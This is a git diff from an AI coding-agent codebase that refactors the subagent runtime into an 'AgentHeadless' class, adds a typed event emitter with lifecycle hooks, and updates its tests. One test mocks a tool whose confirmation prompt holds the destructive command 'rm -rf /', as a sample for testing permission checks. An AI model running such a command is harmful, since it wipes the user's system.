─────────────────────────────────────── + + getEventEmitter(): AgentEventEmitter | undefined { + return this.eventEmitter; + } + + getExecutionSummary(): AgentStatsSummary { + return this.stats.getSummary(); + } + + /** + * Returns legacy execution statistics and per-tool usage. + * Returns legacy execution statistics and per-tool usage. + */ + getStatistics(): { + successRate: number; + toolUsage: Array<{ + name: string; + count: number; + success: number; + failure: number; + lastError?: string; + totalDurationMs?: number; + averageDurationMs?: number; + }>; + } & ExecutionStats { + const total = this.executionStats.totalToolCalls; + const successRate = + total > 0 ? (this.executionStats.successfulToolCalls / total) * 100 : 0; + return { + ...this.executionStats, + successRate, + toolUsage: Array.from(this.toolUsage.entries()).map(([name, v]) => ({ + name, + ...v, + })), + }; + } + + /** + * Safely retrieves the description of a tool by attempting to build it. + * Returns an empty string if any error occurs during the process. + */ + getToolDescription(toolName: string, args: Record): string { + try { + const toolRegistry = this.runtimeContext.getToolRegistry(); + const tool = toolRegistry.getTool(toolName); + if (!tool) { + return ''; + } + + const toolInstance = tool.build(args); + return toolInstance.getDescription() || ''; + } catch { + return ''; + } + } + + private getToolIsOutputMarkdown(toolName: string): boolean { + try { + const toolRegistry = this.runtimeContext.getToolRegistry(); + return toolRegistry.getTool(toolName)?.isOutputMarkdown ?? false; + } catch { + return false; + } + } + + /** + * Records tool call statistics for both successful and failed tool calls. + */ + recordToolCallStats( + toolName: string, + success: boolean, + durationMs: number, + errorMessage?: string, + ): void { + // Update aggregate stats + this.executionStats.totalToolCalls += 1; + if (success) { + this.executionStats.successfulToolCalls += 1; + } else { + this.executionStats.failedToolCalls += 1; + } + + // Per-tool usage + const tu = this.toolUsage.get(toolName) || { + count: 0, + success: 0, + failure: 0, + totalDurationMs: 0, + averageDurationMs: 0, + }; + tu.count += 1; + if (success) { + tu.success += 1; + } else { + tu.failure += 1; + tu.lastError = errorMessage || 'Unknown error'; + } + tu.totalDurationMs = (tu.totalDurationMs || 0) + durationMs; + tu.averageDurationMs = tu.count > 0 ? tu.totalDurationMs / tu.count : 0; + this.toolUsage.set(toolName, tu); + + // Update statistics service + this.stats.recordToolCall( + toolName, + success, + durationMs, + this.toolUsage.get(toolName)?.lastError, + ); + } + + // ─── Private Helpers ────────────────────────────────────── + + /** + * Builds the system prompt with template substitution and optional + * non-interactive instructions suffix. + */ + private buildChatSystemPrompt( + context: ContextState, + options?: CreateChatOptions, + ): string { + if (!this.promptConfig.systemPrompt) { + return ''; + } + + let finalPrompt = templateString(this.promptConfig.systemPrompt, context); + + // Only add non-interactive instructions when NOT in interactive mode + if (!options?.interactive) { + finalPrompt += ` + +Important Rules: + - You operate in non-interactive mode: do not ask the user questions; proceed with available context. + - Use tools only when necessary to obtain facts or make changes. + - When the task is complete, return the final result as a normal model response (not a tool call) and stop.`; + } + + // Append user memory (QWEN.md + output-language.md) to ensure subagent respects project conventions + const userMemory = this.runtimeContext.getUserMemory(); + if (userMemory && userMemory.trim().length > 0) { + finalPrompt += `\n\n---\n\n${userMemory.trim()}`; + } + + return finalPrompt; + } + + /** + * Records token usage from model response metadata. + */ + private recordTokenUsage( + usage: GenerateContentResponseUsageMetadata, + turnCounter: number, + roundStreamStart: number, + ): void { + const inTok = Number(usage.promptTokenCount || 0); + const outTok = Number(usage.candidatesTokenCount || 0); + const thoughtTok = Number(usage.thoughtsTokenCount || 0); + const cachedTok = Number(usage.cachedContentTokenCount || 0); + const totalTok = Number(usage.totalTokenCount || 0); + // Prefer totalTokenCount (prompt + output) for context usage — the + // output from this round becomes history for the next, matching + // the approach in geminiChat.ts. + const contextTok = isFinite(totalTok) && totalTok > 0 ? totalTok : inTok; + if (isFinite(contextTok) && contextTok > 0) { + this.lastPromptTokenCount = contextTok; + } + if ( + isFinite(inTok) || + isFinite(outTok) || + isFinite(thoughtTok) || + isFinite(cachedTok) + ) { + this.stats.recordTokens( + isFinite(inTok) ? inTok : 0, + isFinite(outTok) ? outTok : 0, + isFinite(thoughtTok) ? thoughtTok : 0, + isFinite(cachedTok) ? cachedTok : 0, + isFinite(totalTok) ? totalTok : 0, + ); + // Mirror legacy fields for compatibility + this.executionStats.inputTokens = + (this.executionStats.inputTokens || 0) + (isFinite(inTok) ? inTok : 0); + this.executionStats.outputTokens = + (this.executionStats.outputTokens || 0) + + (isFinite(outTok) ? outTok : 0); + this.executionStats.totalTokens = + (this.executionStats.totalTokens || 0) + + (isFinite(totalTok) ? totalTok : 0); + } + this.eventEmitter?.emit(AgentEventType.USAGE_METADATA, { + subagentId: this.subagentId, + round: turnCounter, + usage, + durationMs: Date.now() - roundStreamStart, + timestamp: Date.now(), + } as AgentUsageEvent); + } +} diff --git a/packages/core/src/agents/runtime/agent-events.ts b/packages/core/src/agents/runtime/agent-events.ts new file mode 100644 index 000000000..4626bb0cd --- /dev/null +++ b/packages/core/src/agents/runtime/agent-events.ts @@ -0,0 +1,260 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Agent event types, emitter, and lifecycle hooks. + * + * Defines the observation/notification contracts for the agent runtime: + * - Event types emitted during agent execution (streaming, tool calls, etc.) + * - AgentEventEmitter — typed wrapper around EventEmitter + * - Lifecycle hooks (pre/post tool use, stop) for synchronous callbacks + */ + +import { EventEmitter } from 'events'; +import type { + ToolCallConfirmationDetails, + ToolConfirmationOutcome, + ToolResultDisplay, +} from '../../tools/tools.js'; +import type { Part, GenerateContentResponseUsageMetadata } from '@google/genai'; +import type { AgentStatus } from './agent-types.js'; + +// ─── Event Types ──────────────────────────────────────────── + +export type AgentEvent = + | 'start' + | 'round_start' + | 'round_end' + | 'round_text' + | 'stream_text' + | 'tool_call' + | 'tool_result' + | 'tool_output_update' + | 'tool_waiting_approval' + | 'usage_metadata' + | 'finish' + | 'error' + | 'status_change'; + +export enum AgentEventType { + START = 'start', + ROUND_START = 'round_start', + ROUND_END = 'round_end', + /** Complete round text, emitted once after streaming before tool calls. */ + ROUND_TEXT = 'round_text', + STREAM_TEXT = 'stream_text', + TOOL_CALL = 'tool_call', + TOOL_RESULT = 'tool_result', + TOOL_OUTPUT_UPDATE = 'tool_output_update', + TOOL_WAITING_APPROVAL = 'tool_waiting_approval', + USAGE_METADATA = 'usage_metadata', + FINISH = 'finish', + ERROR = 'error', + STATUS_CHANGE = 'status_change', +} + +// ─── Event Payloads ───────────────────────────────────────── + +export interface AgentStartEvent { + subagentId: string; + name: string; + model?: string; + tools: string[]; + timestamp: number; +} + +export interface AgentRoundEvent { + subagentId: string; + round: number; + promptId: string; + timestamp: number; +} + +export interface AgentRoundTextEvent { + subagentId: string; + round: number; + text: string; + thoughtText: string; + timestamp: number; +} + +export interface AgentStreamTextEvent { + subagentId: string; + round: number; + text: string; + /** Whether this text is reasoning/thinking content (as opposed to regular output) */ + thought?: boolean; + timestamp: number; +} + +export interface AgentUsageEvent { + subagentId: string; + round: number; + usage: GenerateContentResponseUsageMetadata; + durationMs?: number; + timestamp: number; +} + +export interface AgentToolCallEvent { + subagentId: string; + round: number; + callId: string; + name: string; + args: Record; + description: string; + /** Whether the tool's output should be rendered as markdown. */ + isOutputMarkdown?: boolean; + timestamp: number; +} + +export interface AgentToolResultEvent { + subagentId: string; + round: number; + callId: string; + name: string; + success: boolean; + error?: string; + responseParts?: Part[]; + resultDisplay?: ToolResultDisplay; + /** Path to the temp file where oversized output was saved. */ + outputFile?: string; + durationMs?: number; + timestamp: number; +} + +export interface AgentToolOutputUpdateEvent { + subagentId: string; + round: number; + callId: string; + /** Latest accumulated output for this tool call (replaces previous). */ + outputChunk: ToolResultDisplay; + /** PTY process PID — present when the tool runs in an interactive shell. */ + pid?: number; + timestamp: number; +} + +export interface AgentApprovalRequestEvent { + subagentId: string; + round: number; + callId: string; + name: string; + description: string; + confirmationDetails: Omit & { + type: ToolCallConfirmationDetails['type']; + }; + respond: ( + outcome: ToolConfirmationOutcome, + payload?: Parameters[1], + ) => Promise; + timestamp: number; +} + +export interface AgentFinishEvent { + subagentId: string; + terminateReason: string; + timestamp: number; + rounds?: number; + totalDurationMs?: number; + totalToolCalls?: number; + successfulToolCalls?: number; + failedToolCalls?: number; + inputTokens?: number; + outputTokens?: number; + totalTokens?: number; +} + +export interface AgentErrorEvent { + subagentId: string; + error: string; + timestamp: number; +} + +export interface AgentStatusChangeEvent { + agentId: string; + previousStatus: AgentStatus; + newStatus: AgentStatus; + /** True when the transition to IDLE was caused by user cancelling the round. */ + roundCancelledByUser?: boolean; + timestamp: number; +} + +// ─── Event Map ────────────────────────────────────────────── + +/** + * Maps each event type to its payload type for type-safe emit/on. + */ +export interface AgentEventMap { + [AgentEventType.START]: AgentStartEvent; + [AgentEventType.ROUND_START]: AgentRoundEvent; + [AgentEventType.ROUND_END]: AgentRoundEvent; + [AgentEventType.ROUND_TEXT]: AgentRoundTextEvent; + [AgentEventType.STREAM_TEXT]: AgentStreamTextEvent; + [AgentEventType.TOOL_CALL]: AgentToolCallEvent; + [AgentEventType.TOOL_RESULT]: AgentToolResultEvent; + [AgentEventType.TOOL_OUTPUT_UPDATE]: AgentToolOutputUpdateEvent; + [AgentEventType.TOOL_WAITING_APPROVAL]: AgentApprovalRequestEvent; + [AgentEventType.USAGE_METADATA]: AgentUsageEvent; + [AgentEventType.FINISH]: AgentFinishEvent; + [AgentEventType.ERROR]: AgentErrorEvent; + [AgentEventType.STATUS_CHANGE]: AgentStatusChangeEvent; +} + +// ─── Event Emitter ────────────────────────────────────────── + +export class AgentEventEmitter { + private ee = new EventEmitter(); + + on( + event: E, + listener: (payload: AgentEventMap[E]) => void, + ): void { + this.ee.on(event, listener as (...args: unknown[]) => void); + } + + off( + event: E, + listener: (payload: AgentEventMap[E]) => void, + ): void { + this.ee.off(event, listener as (...args: unknown[]) => void); + } + + emit( + event: E, + payload: AgentEventMap[E], + ): void { + this.ee.emit(event, payload); + } +} + +// ─── Lifecycle Hooks ──────────────────────────────────────── + +export interface PreToolUsePayload { + subagentId: string; + name: string; // subagent name + toolName: string; + args: Record; + timestamp: number; +} + +export interface PostToolUsePayload extends PreToolUsePayload { + success: boolean; + durationMs: number; + errorMessage?: string; +} + +export interface AgentStopPayload { + subagentId: string; + name: string; // subagent name + terminateReason: string; + summary: Record; + timestamp: number; +} + +export interface AgentHooks { + preToolUse?(payload: PreToolUsePayload): Promise | void; + postToolUse?(payload: PostToolUsePayload): Promise | void; + onStop?(payload: AgentStopPayload): Promise | void; +} diff --git a/packages/core/src/subagents/subagent.test.ts b/packages/core/src/agents/runtime/agent-headless.test.ts similarity index 85% rename from packages/core/src/subagents/subagent.test.ts rename to packages/core/src/agents/runtime/agent-headless.test.ts index 0286d11c8..01ff1b040 100644 --- a/packages/core/src/subagents/subagent.test.ts +++ b/packages/core/src/agents/runtime/agent-headless.test.ts @@ -21,39 +21,39 @@ import { vi, type Mock, } from 'vitest'; -import { Config, type ConfigParameters } from '../config/config.js'; -import { DEFAULT_QWEN_MODEL } from '../config/models.js'; +import { Config, type ConfigParameters } from '../../config/config.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; import { createContentGenerator, createContentGeneratorConfig, resolveContentGeneratorConfigWithSources, AuthType, -} from '../core/contentGenerator.js'; -import { GeminiChat } from '../core/geminiChat.js'; -import { executeToolCall } from '../core/nonInteractiveToolExecutor.js'; -import type { ToolRegistry } from '../tools/tool-registry.js'; -import { type AnyDeclarativeTool } from '../tools/tools.js'; -import { ContextState, SubAgentScope } from './subagent.js'; +} from '../../core/contentGenerator.js'; +import { GeminiChat } from '../../core/geminiChat.js'; +import { executeToolCall } from '../../core/nonInteractiveToolExecutor.js'; +import type { ToolRegistry } from '../../tools/tool-registry.js'; +import { type AnyDeclarativeTool } from '../../tools/tools.js'; +import { ContextState, AgentHeadless } from './agent-headless.js'; import { - SubAgentEventEmitter, - SubAgentEventType, - type SubAgentStreamTextEvent, - type SubAgentToolCallEvent, - type SubAgentToolResultEvent, -} from './subagent-events.js'; + AgentEventEmitter, + AgentEventType, + type AgentStreamTextEvent, + type AgentToolCallEvent, + type AgentToolResultEvent, +} from './agent-events.js'; import type { ModelConfig, PromptConfig, RunConfig, ToolConfig, -} from './types.js'; -import { SubagentTerminateMode } from './types.js'; +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; -vi.mock('../core/geminiChat.js'); -vi.mock('../core/contentGenerator.js', async (importOriginal) => { +vi.mock('../../core/geminiChat.js'); +vi.mock('../../core/contentGenerator.js', async (importOriginal) => { const actual = - await importOriginal(); - const { DEFAULT_QWEN_MODEL } = await import('../config/models.js'); + await importOriginal(); + const { DEFAULT_QWEN_MODEL } = await import('../../config/models.js'); return { ...actual, createContentGenerator: vi.fn().mockResolvedValue({ @@ -77,7 +77,7 @@ vi.mock('../core/contentGenerator.js', async (importOriginal) => { }), }; }); -vi.mock('../utils/environmentContext.js', () => ({ +vi.mock('../../utils/environmentContext.js', () => ({ getEnvironmentContext: vi.fn().mockResolvedValue([{ text: 'Env Context' }]), getInitialChatHistory: vi.fn(async (_config, extraHistory) => [ { @@ -91,11 +91,11 @@ vi.mock('../utils/environmentContext.js', () => ({ ...(extraHistory ?? []), ]), })); -vi.mock('../core/nonInteractiveToolExecutor.js'); -vi.mock('../ide/ide-client.js'); -vi.mock('../core/client.js'); +vi.mock('../../core/nonInteractiveToolExecutor.js'); +vi.mock('../../ide/ide-client.js'); +vi.mock('../../core/client.js'); -vi.mock('../skills/skill-manager.js', () => { +vi.mock('../../skills/skill-manager.js', () => { const SkillManagerMock = vi.fn(); SkillManagerMock.prototype.startWatching = vi .fn() @@ -107,7 +107,7 @@ vi.mock('../skills/skill-manager.js', () => { return { SkillManager: SkillManagerMock }; }); -vi.mock('./subagent-manager.js', () => { +vi.mock('../../subagents/subagent-manager.js', () => { const SubagentManagerMock = vi.fn(); SubagentManagerMock.prototype.loadSessionSubagents = vi.fn(); SubagentManagerMock.prototype.addChangeListener = vi @@ -226,7 +226,7 @@ describe('subagent.ts', () => { }); }); - describe('SubAgentScope', () => { + describe('AgentHeadless', () => { let mockSendMessageStream: Mock; const defaultModelConfig: ModelConfig = { @@ -299,16 +299,16 @@ describe('subagent.ts', () => { describe('create (Tool Validation)', () => { const promptConfig: PromptConfig = { systemPrompt: 'Test prompt' }; - it('should create a SubAgentScope successfully with minimal config', async () => { + it('should create a AgentHeadless successfully with minimal config', async () => { const { config } = await createMockConfig(); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, defaultModelConfig, defaultRunConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should not block creation when a tool may require confirmation', async () => { @@ -316,7 +316,8 @@ describe('subagent.ts', () => { name: 'risky_tool', schema: { parametersJsonSchema: { type: 'object', properties: {} } }, build: vi.fn().mockReturnValue({ - shouldConfirmExecute: vi.fn().mockResolvedValue({ + getDefaultPermission: vi.fn().mockResolvedValue('ask'), + getConfirmationDetails: vi.fn().mockResolvedValue({ type: 'exec', title: 'Confirm', command: 'rm -rf /', @@ -331,7 +332,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['risky_tool'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -339,7 +340,7 @@ describe('subagent.ts', () => { defaultRunConfig, toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should succeed if tools do not require confirmation', async () => { @@ -347,7 +348,7 @@ describe('subagent.ts', () => { name: 'safe_tool', schema: { parametersJsonSchema: { type: 'object', properties: {} } }, build: vi.fn().mockReturnValue({ - shouldConfirmExecute: vi.fn().mockResolvedValue(null), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), }), }; const { config } = await createMockConfig({ @@ -357,7 +358,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['safe_tool'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -365,7 +366,7 @@ describe('subagent.ts', () => { defaultRunConfig, toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); }); it('should allow creation regardless of tool parameter requirements', async () => { @@ -390,7 +391,7 @@ describe('subagent.ts', () => { const toolConfig: ToolConfig = { tools: ['tool_with_params'] }; - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -399,13 +400,13 @@ describe('subagent.ts', () => { toolConfig, ); - expect(scope).toBeInstanceOf(SubAgentScope); + expect(scope).toBeInstanceOf(AgentHeadless); // Ensure build was not called during creation expect(mockToolWithParams.build).not.toHaveBeenCalled(); }); }); - describe('runNonInteractive - Initialization and Prompting', () => { + describe('execute - Initialization and Prompting', () => { it('should correctly template the system prompt and initialize GeminiChat', async () => { const { config } = await createMockConfig(); @@ -421,7 +422,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -429,7 +430,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); // Check if GeminiChat was initialized correctly by the subagent expect(GeminiChat).toHaveBeenCalledTimes(1); @@ -473,7 +474,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -481,7 +482,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); expect(generationConfig.systemInstruction).toContain( @@ -511,7 +512,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -519,7 +520,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); const sysPrompt = generationConfig.systemInstruction as string; @@ -540,7 +541,7 @@ describe('subagent.ts', () => { mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -548,7 +549,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const generationConfig = getGenerationConfigFromMock(); const sysPrompt = generationConfig.systemInstruction as string; @@ -568,7 +569,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -576,7 +577,7 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(context); + await scope.execute(context); const callArgs = vi.mocked(GeminiChat).mock.calls[0]; const generationConfig = getGenerationConfigFromMock(); @@ -602,7 +603,7 @@ describe('subagent.ts', () => { context.set('name', 'Agent'); // 'missing' is not set - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -610,11 +611,11 @@ describe('subagent.ts', () => { defaultRunConfig, ); - // The error from templating causes the runNonInteractive to reject and the terminate_reason to be ERROR. - await expect(scope.runNonInteractive(context)).rejects.toThrow( + // The error from templating causes the execute to reject and the terminate_reason to be ERROR. + await expect(scope.execute(context)).rejects.toThrow( 'Missing context values for the following keys: missing', ); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); it('should validate that systemPrompt and initialMessages are mutually exclusive', async () => { @@ -625,7 +626,7 @@ describe('subagent.ts', () => { }; const context = new ContextState(); - const agent = await SubAgentScope.create( + const agent = await AgentHeadless.create( 'TestAgent', config, promptConfig, @@ -633,14 +634,14 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await expect(agent.runNonInteractive(context)).rejects.toThrow( + await expect(agent.execute(context)).rejects.toThrow( 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', ); - expect(agent.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + expect(agent.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); }); - describe('runNonInteractive - Execution and Tool Use', () => { + describe('execute - Execution and Tool Use', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; it('should terminate with GOAL if no outputs are expected and model stops', async () => { @@ -648,7 +649,7 @@ describe('subagent.ts', () => { // Model stops immediately mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -657,9 +658,9 @@ describe('subagent.ts', () => { // No ToolConfig, No OutputConfig ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); // Check the initial message expect(mockSendMessageStream.mock.calls[0][1].message).toEqual([ @@ -673,7 +674,7 @@ describe('subagent.ts', () => { // Model stops immediately with text response mockSendMessageStream.mockImplementation(createMockStream(['stop'])); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -681,9 +682,9 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); }); @@ -722,7 +723,7 @@ describe('subagent.ts', () => { params: { path: '.' }, getDescription: vi.fn().mockReturnValue('List files'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockResolvedValue({ llmContent: 'file1.txt\nfile2.ts', returnDisplay: 'Listed 2 files', @@ -744,7 +745,7 @@ describe('subagent.ts', () => { name === 'list_files' ? listFilesTool : undefined, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -753,7 +754,7 @@ describe('subagent.ts', () => { toolConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); // Check the response sent back to the model (functionResponse part) const secondCallArgs = mockSendMessageStream.mock.calls[1][1]; @@ -764,11 +765,11 @@ describe('subagent.ts', () => { 'file1.txt\nfile2.ts', ); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); }); }); - describe('runNonInteractive - Termination and Recovery', () => { + describe('execute - Termination and Recovery', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; it('should terminate with MAX_TURNS if the limit is reached', async () => { @@ -800,7 +801,7 @@ describe('subagent.ts', () => { ]), ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -808,10 +809,10 @@ describe('subagent.ts', () => { runConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); expect(mockSendMessageStream).toHaveBeenCalledTimes(2); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.MAX_TURNS); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.MAX_TURNS); }); it.skip('should terminate with TIMEOUT if the time limit is reached during an LLM call', async () => { @@ -835,7 +836,7 @@ describe('subagent.ts', () => { // The LLM call will hang until we resolve the promise. mockSendMessageStream.mockReturnValue(streamPromise); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -843,7 +844,7 @@ describe('subagent.ts', () => { runConfig, ); - const runPromise = scope.runNonInteractive(new ContextState()); + const runPromise = scope.execute(new ContextState()); // Advance time beyond the limit (6 minutes) while the agent is awaiting the LLM response. await vi.advanceTimersByTimeAsync(6 * 60 * 1000); @@ -854,7 +855,7 @@ describe('subagent.ts', () => { await runPromise; - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.TIMEOUT); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.TIMEOUT); expect(mockSendMessageStream).toHaveBeenCalledTimes(1); vi.useRealTimers(); @@ -864,7 +865,7 @@ describe('subagent.ts', () => { const { config } = await createMockConfig(); mockSendMessageStream.mockRejectedValue(new Error('API Failure')); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -872,14 +873,14 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await expect( - scope.runNonInteractive(new ContextState()), - ).rejects.toThrow('API Failure'); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.ERROR); + await expect(scope.execute(new ContextState())).rejects.toThrow( + 'API Failure', + ); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.ERROR); }); }); - describe('runNonInteractive - Streaming and Thought Handling', () => { + describe('execute - Streaming and Thought Handling', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; // Helper to create a mock stream that yields specific parts @@ -913,13 +914,13 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const eventEmitter = new SubAgentEventEmitter(); - const events: SubAgentStreamTextEvent[] = []; - eventEmitter.on(SubAgentEventType.STREAM_TEXT, (...args: unknown[]) => { - events.push(args[0] as SubAgentStreamTextEvent); + const eventEmitter = new AgentEventEmitter(); + const events: AgentStreamTextEvent[] = []; + eventEmitter.on(AgentEventType.STREAM_TEXT, (...args: unknown[]) => { + events.push(args[0] as AgentStreamTextEvent); }); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -929,7 +930,7 @@ describe('subagent.ts', () => { eventEmitter, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); expect(events).toHaveLength(2); expect(events[0]!.text).toBe('Let me think...'); @@ -952,7 +953,7 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -960,9 +961,9 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(scope.getFinalText()).toBe('The final answer.'); }); @@ -1016,7 +1017,7 @@ describe('subagent.ts', () => { }) as unknown as GeminiChat, ); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -1024,16 +1025,16 @@ describe('subagent.ts', () => { defaultRunConfig, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); - expect(scope.getTerminateMode()).toBe(SubagentTerminateMode.GOAL); + expect(scope.getTerminateMode()).toBe(AgentTerminateMode.GOAL); expect(scope.getFinalText()).toBe('Actual output.'); // Should have been called twice: first with thought-only, then nudged expect(mockSendMessageStream).toHaveBeenCalledTimes(2); }); }); - describe('runNonInteractive - Tool Restriction Enforcement (Issue #1121)', () => { + describe('execute - Tool Restriction Enforcement (Issue #1121)', () => { const promptConfig: PromptConfig = { systemPrompt: 'Execute task.' }; it('should NOT execute tools that are not in the allowed tools list', async () => { @@ -1056,7 +1057,7 @@ describe('subagent.ts', () => { params: { path: 'test.txt' }, getDescription: vi.fn().mockReturnValue('Read file'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockImplementation(async () => { executedTools.push('read_file'); return { @@ -1070,7 +1071,7 @@ describe('subagent.ts', () => { params: { path: 'test.txt', content: 'malicious content' }, getDescription: vi.fn().mockReturnValue('Edit file'), toolLocations: vi.fn().mockReturnValue([]), - shouldConfirmExecute: vi.fn().mockResolvedValue(false), + getDefaultPermission: vi.fn().mockResolvedValue('allow'), execute: vi.fn().mockImplementation(async () => { executedTools.push('edit_file'); return { @@ -1142,19 +1143,19 @@ describe('subagent.ts', () => { ); // Track emitted events - const toolCallEvents: SubAgentToolCallEvent[] = []; - const toolResultEvents: SubAgentToolResultEvent[] = []; + const toolCallEvents: AgentToolCallEvent[] = []; + const toolResultEvents: AgentToolResultEvent[] = []; // Create event emitter BEFORE the scope and subscribe to events - const eventEmitter = new SubAgentEventEmitter(); - eventEmitter.on(SubAgentEventType.TOOL_CALL, (event: unknown) => { - toolCallEvents.push(event as SubAgentToolCallEvent); + const eventEmitter = new AgentEventEmitter(); + eventEmitter.on(AgentEventType.TOOL_CALL, (event: unknown) => { + toolCallEvents.push(event as AgentToolCallEvent); }); - eventEmitter.on(SubAgentEventType.TOOL_RESULT, (event: unknown) => { - toolResultEvents.push(event as SubAgentToolResultEvent); + eventEmitter.on(AgentEventType.TOOL_RESULT, (event: unknown) => { + toolResultEvents.push(event as AgentToolResultEvent); }); - const scope = await SubAgentScope.create( + const scope = await AgentHeadless.create( 'test-agent', config, promptConfig, @@ -1164,7 +1165,7 @@ describe('subagent.ts', () => { eventEmitter, ); - await scope.runNonInteractive(new ContextState()); + await scope.execute(new ContextState()); // 1. Only allowed tool should be executed expect(executedTools).toContain('read_file'); diff --git a/packages/core/src/agents/runtime/agent-headless.ts b/packages/core/src/agents/runtime/agent-headless.ts new file mode 100644 index 000000000..ac02f80df --- /dev/null +++ 